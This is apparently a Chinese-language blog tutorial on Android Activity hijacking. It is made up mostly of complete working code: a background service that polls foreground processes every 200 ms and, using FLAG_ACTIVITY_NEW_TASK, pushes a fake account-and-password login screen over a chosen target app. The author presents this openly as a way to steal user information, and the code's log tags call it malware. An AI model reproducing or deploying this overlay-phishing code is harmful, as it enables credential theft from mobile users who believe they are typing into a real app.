Android-Acitivity劫持
由於Android的設計缺陷,當我們爲Activity指定標誌位FLAG_ ACTIVITY_ NEW_ TASK時,就能使Activity置於棧頂,並呈現給用戶。
當然利用這個缺陷可以做很多羞羞的事情 【==】可以劫持用戶信息,可以無限彈框(-。-;)等等ect.
今天我們來實現Activity劫持的代碼:
1.通過遍歷所有的進程,得到當前前臺正在運行的應用進程
2.判斷是否是目標進程,如果是啓動僞造的Activity,對用戶信息進行劫持。
hackService用於執行劫持主要邏輯
public class HackService extends Service {
//targetMap用於存放我們的目標程序
HashMap<String, Class<?>> targetMap = new HashMap<String, Class<?>>();
Handler handler = new Handler();
boolean isStart = false;
//我們新建一個Runnable對象,每隔200ms進行一次搜索
Runnable searchTarget = new Runnable() {
@Override
public void run() {
//得到ActivityManager
ActivityManager activityManager = (ActivityManager) getSystemService(Context.ACTIVITY_SERVICE);
//通過ActivityManager將當前正在運行的進程存入processInfo中
List<ActivityManager.RunningAppProcessInfo> processInfo = activityManager.getRunningAppProcesses();
Log.w("惡意軟件", "遍歷進程");
//遍歷processInfo中的進程信息,看是否有我們的目標
for (ActivityManager.RunningAppProcessInfo _processInfo : processInfo) {
//若processInfo中的進程正在前臺且是我們的目標進程,則調用hijack方法進行劫持
if (_processInfo.importance == ActivityManager.RunningAppProcessInfo.IMPORTANCE_FOREGROUND) {
if (targetMap.containsKey(_processInfo.processName)) {
// 調用hijack方法進行劫持
hijack(_processInfo.processName);
} else {
Log.w("進程", _processInfo.processName);
}
}
}
handler.postDelayed(searchTarget, 200);
}
};
//進行Activity劫持的函數
private void hijack(String processName) {
//這裏判斷我們的目標程序是否已經被劫持過了
if (((hackApplication) getApplication())
.hasProgressBeHijacked(processName) == false) {
Log.w("惡意軟件", "開始劫持"+processName);
Intent intent = new Intent(getBaseContext(),
targetMap.get(processName));
//這裏必須將flag設置爲Intent.FLAG_ACTIVITY_NEW_TASK,這樣才能將我們僞造的Activity至於棧頂
intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
//啓動我們僞造的Activity
getApplication().startActivity(intent);
//將目標程序加入到已劫持列表中
((hackApplication) getApplication()).addHijacked(processName);
Log.w("惡意軟件", "已經劫持");
}
}
@Override
public void onStart(Intent intent, int startId) {
super.onStart(intent, startId);
if (!isStart) {
//將我們的目標加入targetMap中
//這裏,key爲我們的目標進程,value爲我們僞造的Activity
targetMap.put("com.example.mrsj.activity",
MainActivity.class);
//啓動searchTarget
handler.postDelayed(searchTarget, 1000);
isStart = true;
}
}
@Override
public boolean stopService(Intent name) {
isStart = false;
Log.w("惡意軟件", "停止劫持");
//清空劫持列表
((hackApplication) getApplication()).clearHijacked();
//停止searchTarget
handler.removeCallbacks(searchTarget);
return super.stopService(name);
}
@Override
public IBinder onBind(Intent intent) {
return null;
}
}
hackApplication實現自己的application,並且要在manifest文件中聲明application的android:name=”.hackApplication”
public class hackApplication extends Application {
List<String> hijackedList = new ArrayList<String>();
public boolean hasProgressBeHijacked(String processName) {
//return hijackedList.contains(processName);
return false;
}
public void addHijacked(String processName) {
hijackedList.add(processName);
}
public void clearHijacked() {
hijackedList.clear();
}
}
在MainActivity 中實現僞造Activity的呈現效果
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
final EditText user=(EditText)findViewById(R.id.user);
final EditText pass=(EditText)findViewById(R.id.pass);
final Button login=(Button)findViewById(R.id.login);
Timer timer=new Timer();
TimerTask task=new TimerTask() {
@Override
public void run() {
runOnUiThread(new Runnable() {
@Override
public void run() {
user.setVisibility(View.VISIBLE);
pass.setVisibility(View.VISIBLE);
login.setVisibility(View.VISIBLE);
}
});
}
};
timer.schedule(task,1000);
login.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
user.setVisibility(View.INVISIBLE);
pass.setVisibility(View.INVISIBLE);
login.setVisibility(View.INVISIBLE);
finish();
}
});
}
}
佈局文件activity_main
<?xml version="1.0" encoding="utf-8"?>
<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:paddingBottom="@dimen/activity_vertical_margin"
android:paddingLeft="@dimen/activity_horizontal_margin"
android:paddingRight="@dimen/activity_horizontal_margin"
android:paddingTop="@dimen/activity_vertical_margin"
>
<LinearLayout
android:id="@+id/linear"
android:orientation="vertical"
android:layout_width="match_parent"
android:layout_height="wrap_content">
<LinearLayout
android:orientation="horizontal"
android:layout_width="match_parent"
android:layout_height="wrap_content">
<TextView
android:textSize="18sp"
android:text="賬號:"
android:layout_width="wrap_content"
android:layout_height="wrap_content" />
<EditText
android:visibility="invisible"
android:id="@+id/user"
android:hint="賬號"
android:layout_width="match_parent"
android:layout_height="wrap_content" />
</LinearLayout>
<LinearLayout
android:orientation="horizontal"
android:layout_width="match_parent"
android:layout_height="wrap_content">
<TextView
android:textSize="18sp"
android:text="密碼:"
android:layout_width="wrap_content"
android:layout_height="wrap_content" />
<EditText
android:visibility="invisible"
android:id="@+id/pass"
android:hint="密碼"
android:layout_width="match_parent"
android:layout_height="wrap_content" />
</LinearLayout>
</LinearLayout>
<Button
android:visibility="invisible"
android:id="@+id/login"
android:layout_below="@id/linear"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:text="登錄" />
</RelativeLayout>